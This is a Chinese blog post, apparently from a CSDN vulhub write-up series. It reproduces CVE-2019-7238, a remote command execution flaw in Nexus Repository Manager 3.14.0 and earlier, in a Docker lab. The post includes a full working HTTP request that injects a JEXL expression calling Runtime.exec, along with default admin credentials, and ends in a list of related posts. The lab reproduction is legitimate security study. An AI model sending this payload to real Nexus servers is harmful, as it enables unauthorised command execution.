Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现

最新推荐文章于 2024-06-12 09:49:29 发布
最新推荐文章于 2024-06-12 09:49:29 发布
阅读量318 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 网络安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114315732
版权

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)

by ADummy

0x00利用路线

​ ysoserial生成payload—>上传给网站进行解析—>命令执行

0x01漏洞介绍

​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。

0x02漏洞复现

​ 等待一段时间环境才能成功启动,访问http://your-ip:8081即可看到Web页面。

使用账号密码admin:admin123登录后台,然后在maven-releases下随便上传一个jar包:

ps:此处只是为了保证仓库中至少有一个包存在
在这里插入图片描述

POST /service/extdirect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 368
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}

在这里插入图片描述

进入docker 发现 touch /tmp/success被执行

在这里插入图片描述

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0 found by Rico Tencent Security Yunding Lab and [@voidfyoo](https://twitter.com/voidfyoo)
CVE-2019-7238复现
梦之序章的博客
04-13 6072
成因 Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,可以简单的理解为Maven的私服。 2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。...
Nexus Repository Manager 3 远程命令执行CVE-2019-7238复现
thelostworld
03-28 572
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238复现相关实战项目中遇到,本地搭建环境测试,尝试多种利用方式。一、漏洞背景Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功...
vulhub-NexusCVE-2019-7238
qq_26947429的博客
07-23 374
成因 * Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。* 影响范围: Nexus Repository Manager OSS/Pro 3.6.2-3.14.0 首先访问这个页面,登录admin:admin123,随便传个东西 传好之后呢,用C
Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现
渗透测试研究中心
03-20 661
0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3...
CVE-2019-7238CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3未经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行中!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现
EC_Carrot的博客
03-04 1552
漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238
whatday的专栏
07-31 886
目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE-2019-7238/ 漏洞原理 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致
Nexus Repository Manager 3 RCE(CVE-2019-7238)
公众号shadow sock7
02-13 3554
参考: https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 https://mp.weixin.qq.com/s/...
Nexus Repository Manager 3 RCE CVE-2019-7238
weixin_33688840的博客
02-18 362
Nexus Repository Manager 3 RCE CVE-2019-7238 0x00 参考链接 https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Exe...
Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)
qq_36369941的博客
07-17 3091
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响范围 Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版...
Sonatype Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238
不忘初心,护天下安全!
07-12 1681
研究人员在 Sonatype Nexus Repository Manager ( NXRM ) 3 中发现一个远程代码执行漏洞。Sonatype Nexus Repository Manager ( NXRM ) 3 是一个允许开发者管理软件开发、应用实现、自动硬件提供所必须的软件组件的开源项目。漏洞影响的 NXRM 3 目前安装量已经超过 15 万,该漏洞是腾讯安全云鼎实验室安全研究员 Rico 和长亭科技安全研究员 voidfyoo 发现的。研究人员通过分析发现利用该安全漏洞并不需要认证。因此攻击者很
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
chaojixiaojingang
12-18 856
1.影响版本 Nexus Repository《=3.21.1 2.漏洞描述 Sonatype Nexus 是一个 Maven 的仓库管理系统,在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 3.环境准备 攻击机器:Kali 192.168.157.130 受害机器:docker镜像:192.168.157.1
**深入探索:CVE-2019-7238安全漏洞解析与防护——为您的代码仓库上锁**
最新发布
gitblog_00014的博客
06-12 226
深入探索:CVE-2019-7238安全漏洞解析与防护——为您的代码仓库上锁 项目地址:https://gitcode.com/mpgn/CVE-2019-7238 项目介绍 在数字化转型的浪潮中,软件开发已从封闭走向开放,协作成为常态。然而,伴随着开源文化的蓬勃发展,安全问题也日益凸显。今日,我们将聚焦于一个关键的安全漏洞——CVE-2019-7238,这是一个影响Sonatype Nexus ...
Sonatype Nexus Repository Manager 怎么执行docker pull
06-08
其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值